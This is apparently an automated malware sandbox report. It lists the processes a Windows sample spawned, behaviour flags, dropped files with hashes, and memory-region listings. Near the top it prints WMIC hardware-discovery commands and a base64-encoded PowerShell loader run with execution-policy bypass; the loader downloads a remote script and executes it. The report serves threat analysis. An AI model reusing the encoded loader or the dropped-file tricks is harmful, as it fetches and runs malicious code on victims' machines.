C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7645.exeMD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\7645.exeMD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\RES8EEE.tmpMD5
67007de5e538444640e6945cfe22c29b
SHA1942f9db1a985bc64186acc6f668867147e43df91
SHA2568f6a60e60a06dd5ccc8a96fdf06ff26dd906d2294973cf6f5e9703b8f7723d4f
SHA51202df880e426df11d77f8edb12c7d26fdbd3091144e02527e06bf163825094974dce83712bdc4d3d67366c99002b09915368810013d33dfee72926da38a520e9d
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
f783019c5dc4a5477d1ffd4f9f512979
SHA137c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
SHA2564c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
SHA51264d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
-
C:\Users\Admin\AppData\Local\Temp\nwnnvqyb\nwnnvqyb.dllMD5
6350299f1222819622112f190160b9fa
SHA1034d8426c487c36e6f2b2662c1fd52cfa2e967c8
SHA256ae302b0d18a6d65806dad1024a7c094a2f08266ba0d1b0a705dbd3f2742d5f26
SHA51268087144be7ebc6aa6675bf22c3ac732d0e96df8fe278e3f5806b17506f00c4c0f64a9c015dfe117083c7a5b1795ab8ed9754554334d19fe0c55bb26497cdb8e
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
\??\c:\Users\Admin\AppData\Local\Temp\nwnnvqyb\CSCEB3CB7ED157E4EF6836E44E436CC1C4F.TMPMD5
ff4a8028dbae0f8baeaf722e98eb06ef
SHA1b7b05b0057b71e9ed36df4c0009f9ef1dc82c16d
SHA2569a062e40f059dbdb9a46f00f0b8654cfb7c9d0e81851617d47f0df35968f940d
SHA5129b83177c8f0db8736e1ae336015d0830bf315dce11349fdb45888f65f2280201c9b93bc59336c1a3b90934eed677683b97651cd1ff2ca22d431d2b0f5d0da8a0
-
\??\c:\Users\Admin\AppData\Local\Temp\nwnnvqyb\nwnnvqyb.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\nwnnvqyb\nwnnvqyb.cmdlineMD5
72d905de423287d720c342d3c53af778
SHA1d0aeba6e6ec51089024519a8bb1ed09a47f51648
SHA256e08ffeed958ca11fa08c9208da6bd8c0f08d86c1c77ab2db9907e142c7883862
SHA5128e788bf909f999086a760fbe956a66b24a88fa4daf1851da98c33539be921eaa6b58dd087ecdeb91c72053925c21fa058a21641b388f48419d18c606a5fa548a
-
\Windows\Branding\mediasrv.pngMD5
ac13d804585a74dc542db4ec94da39df
SHA18642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA25684c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA5120ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
\Windows\Branding\mediasvc.pngMD5
9151c95451abb048a44f98d0afac8264
SHA122f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA2568082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13
-
memory/8-117-0x0000000000400000-0x0000000002BAF000-memory.dmpFilesize
39.7MB
-
memory/8-116-0x00000000001E0000-0x00000000001E9000-memory.dmpFilesize
36KB
-
memory/688-163-0x000002A5A9040000-0x000002A5A9041000-memory.dmpFilesize
4KB
-
memory/688-130-0x000002A58C630000-0x000002A58C632000-memory.dmpFilesize
8KB
-
memory/688-135-0x000002A58C630000-0x000002A58C632000-memory.dmpFilesize
8KB
-
memory/688-136-0x000002A58C630000-0x000002A58C632000-memory.dmpFilesize
8KB
-
memory/688-138-0x000002A58C630000-0x000002A58C632000-memory.dmpFilesize
8KB
-
memory/688-137-0x000002A58C630000-0x000002A58C632000-memory.dmpFilesize
8KB
-
memory/688-139-0x000002A5A86D0000-0x000002A5A86D1000-memory.dmpFilesize
4KB
-
memory/688-133-0x000002A58C630000-0x000002A58C632000-memory.dmpFilesize
8KB
-
memory/688-141-0x000002A58C630000-0x000002A58C632000-memory.dmpFilesize
8KB
-
memory/688-145-0x000002A58E3F0000-0x000002A58E3F2000-memory.dmpFilesize
8KB
-
memory/688-146-0x000002A58E3F3000-0x000002A58E3F5000-memory.dmpFilesize
8KB
-
memory/688-147-0x000002A58E3F6000-0x000002A58E3F8000-memory.dmpFilesize
8KB
-
memory/688-162-0x000002A58E3F8000-0x000002A58E3F9000-memory.dmpFilesize
4KB
-
memory/688-161-0x000002A5A8CB0000-0x000002A5A8CB1000-memory.dmpFilesize
4KB
-
memory/688-170-0x000002A58C630000-0x000002A58C632000-memory.dmpFilesize
8KB
-
memory/688-128-0x0000000000000000-mapping.dmp
-
memory/688-132-0x000002A58C630000-0x000002A58C632000-memory.dmpFilesize
8KB
-
memory/688-131-0x000002A58C630000-0x000002A58C632000-memory.dmpFilesize
8KB
-
memory/688-155-0x000002A5A8660000-0x000002A5A8661000-memory.dmpFilesize
4KB
-
memory/688-134-0x000002A5A8520000-0x000002A5A8521000-memory.dmpFilesize
4KB
-
memory/688-129-0x000002A58C630000-0x000002A58C632000-memory.dmpFilesize
8KB
-
memory/820-259-0x0000000000000000-mapping.dmp
-
memory/820-309-0x000001F569AB8000-0x000001F569ABA000-memory.dmpFilesize
8KB
-
memory/820-280-0x000001F569AB3000-0x000001F569AB5000-memory.dmpFilesize
8KB
-
memory/820-279-0x000001F569AB0000-0x000001F569AB2000-memory.dmpFilesize
8KB
-
memory/820-278-0x000001F569AB6000-0x000001F569AB8000-memory.dmpFilesize
8KB
-
memory/844-125-0x000001B971E13000-0x000001B971E15000-memory.dmpFilesize
8KB
-
memory/844-127-0x000001B971E16000-0x000001B971E17000-memory.dmpFilesize
4KB
-
memory/844-122-0x000001B972230000-0x000001B97262F000-memory.dmpFilesize
4.0MB
-
memory/844-119-0x0000000000000000-mapping.dmp
-
memory/844-124-0x000001B971E10000-0x000001B971E12000-memory.dmpFilesize
8KB
-
memory/844-126-0x000001B971E15000-0x000001B971E16000-memory.dmpFilesize
4KB
-
memory/1008-375-0x0000000000000000-mapping.dmp
-
memory/1056-382-0x0000000000000000-mapping.dmp
-
memory/1556-320-0x0000000000000000-mapping.dmp
-
memory/1664-364-0x0000000000000000-mapping.dmp
-
memory/1680-383-0x0000000000000000-mapping.dmp
-
memory/1724-373-0x0000000000000000-mapping.dmp
-
memory/1852-386-0x0000000000000000-mapping.dmp
-
memory/1900-365-0x0000000000000000-mapping.dmp
-
memory/1968-458-0x0000000000000000-mapping.dmp
-
memory/1972-181-0x0000020580050000-0x0000020580052000-memory.dmpFilesize
8KB
-
memory/1972-175-0x0000020580050000-0x0000020580052000-memory.dmpFilesize
8KB
-
memory/1972-218-0x0000020598458000-0x000002059845A000-memory.dmpFilesize
8KB
-
memory/1972-171-0x0000000000000000-mapping.dmp
-
memory/1972-172-0x0000020580050000-0x0000020580052000-memory.dmpFilesize
8KB
-
memory/1972-173-0x0000020580050000-0x0000020580052000-memory.dmpFilesize
8KB
-
memory/1972-203-0x0000020598456000-0x0000020598458000-memory.dmpFilesize
8KB
-
memory/1972-174-0x0000020580050000-0x0000020580052000-memory.dmpFilesize
8KB
-
memory/1972-185-0x0000020580050000-0x0000020580052000-memory.dmpFilesize
8KB
-
memory/1972-184-0x0000020598453000-0x0000020598455000-memory.dmpFilesize
8KB
-
memory/1972-183-0x0000020598450000-0x0000020598452000-memory.dmpFilesize
8KB
-
memory/1972-180-0x0000020580050000-0x0000020580052000-memory.dmpFilesize
8KB
-
memory/1972-176-0x0000020580050000-0x0000020580052000-memory.dmpFilesize
8KB
-
memory/1972-179-0x0000020580050000-0x0000020580052000-memory.dmpFilesize
8KB
-
memory/1972-178-0x0000020580050000-0x0000020580052000-memory.dmpFilesize
8KB
-
memory/2084-372-0x0000000000000000-mapping.dmp
-
memory/2232-374-0x0000000000000000-mapping.dmp
-
memory/2236-384-0x0000000000000000-mapping.dmp
-
memory/2240-363-0x0000000000000000-mapping.dmp
-
memory/2244-380-0x0000000000000000-mapping.dmp
-
memory/2380-358-0x0000000000000000-mapping.dmp
-
memory/2468-368-0x0000000000000000-mapping.dmp
-
memory/2556-151-0x0000000000000000-mapping.dmp
-
memory/2568-118-0x0000000001140000-0x0000000001156000-memory.dmpFilesize
88KB
-
memory/2588-379-0x0000000000000000-mapping.dmp
-
memory/2736-254-0x0000021357476000-0x0000021357478000-memory.dmpFilesize
8KB
-
memory/2736-252-0x0000021357470000-0x0000021357472000-memory.dmpFilesize
8KB
-
memory/2736-277-0x0000021357478000-0x000002135747A000-memory.dmpFilesize
8KB
-
memory/2736-253-0x0000021357473000-0x0000021357475000-memory.dmpFilesize
8KB
-
memory/2736-217-0x0000000000000000-mapping.dmp
-
memory/2868-362-0x0000000000000000-mapping.dmp
-
memory/3044-319-0x0000000000000000-mapping.dmp
-
memory/3144-385-0x0000000000000000-mapping.dmp
-
memory/3236-377-0x0000000000000000-mapping.dmp
-
memory/3288-366-0x0000000000000000-mapping.dmp
-
memory/3292-376-0x0000000000000000-mapping.dmp
-
memory/3488-148-0x0000000000000000-mapping.dmp
-
memory/3488-387-0x0000000000000000-mapping.dmp
-
memory/3488-399-0x000001C7604D0000-0x000001C7604D2000-memory.dmpFilesize
8KB
-
memory/3488-400-0x000001C7604D3000-0x000001C7604D5000-memory.dmpFilesize
8KB
-
memory/3488-405-0x000001C7604D6000-0x000001C7604D8000-memory.dmpFilesize
8KB
-
memory/3488-419-0x000001C7604D8000-0x000001C7604D9000-memory.dmpFilesize
4KB
-
memory/3612-367-0x0000000000000000-mapping.dmp
-
memory/3688-457-0x0000000000000000-mapping.dmp
-
memory/3708-321-0x0000000000000000-mapping.dmp
-
memory/3804-359-0x0000000000000000-mapping.dmp
-
memory/3828-381-0x0000000000000000-mapping.dmp
-
memory/3864-369-0x0000000000000000-mapping.dmp
-
memory/4008-378-0x0000000000000000-mapping.dmp